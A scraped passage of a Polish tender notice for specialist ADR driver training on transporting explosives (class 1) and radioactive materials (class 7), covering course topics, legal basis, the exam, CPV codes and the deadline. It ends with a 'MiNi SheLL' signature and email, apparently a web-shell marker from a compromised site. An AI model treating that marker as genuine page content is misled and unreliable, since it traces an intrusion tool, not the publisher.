Szczególną uwagę należy zwrócić na zachowania kierowcy wynikające z ochrony ładunku przewożonego w pojeździe oznakowanym tablicami ostrzegawczymi barwy pomarańczowej (dział 1.10 ADR). Należy odwołać się do wiadomości zdobytych na kursie podstawowym z tematu Ochrona towarów niebezpiecznych. Niezachowanie szczególnej ochrony przy przewozie materiałów klasy 1 może stanowić zagrożenie o nieobliczalnych skutkach dla ludzi i środowiska.
Szkolenie specjalistyczne ADR dla klasy 7  w wymiarze 8 godz.
Szczególne wymagania dotyczące pakowania, manipulowania, ładowania razem i układania materiałów promieniotwórczych
Specyficzne zagrożenia związane z promieniowaniem jonizującym
Szczególne środki bezpieczeństwa, które powinny być podjęte w razie wypadku z materiałem promieniotwórczym
 Szkolenie realizowane będzie  na  podstawie:
Ustawy z dnia 19 sierpnia 2011r. o przewozie towarów niebezpiecznych ( Dz. U. z 2011r. Nr. 227 poz. 1367  z późn. zm.)
oraz  Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej  z dnia 29 maja 2012r. w sprawie prowadzenia kursów z zakresu  przewozów towarów niebezpiecznych ( Dz. U z 2012r., poz. 619).
Szczególną uwagę należy zwrócić na zachowania kierowcy wynikające z ochrony ładunku przewożonego w pojeździe oznakowanym tablicami ostrzegawczymi barwy pomarańczowej ( dział 1.10 ADR). Należy odwołać się do zdobytych wiadomości na kursie podstawowym z tematu Ochrona towarów niebezpiecznych. Niezachowanie szczególnej ochrony przy przewozie materiałów klasy 7 może stanowić zagrożenie o nieobliczalnych skutkach dla ludzi i środowiska.
Kurs kończy się egzaminem państwowym przeprowadzanym przez Urząd Marszałkowski..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com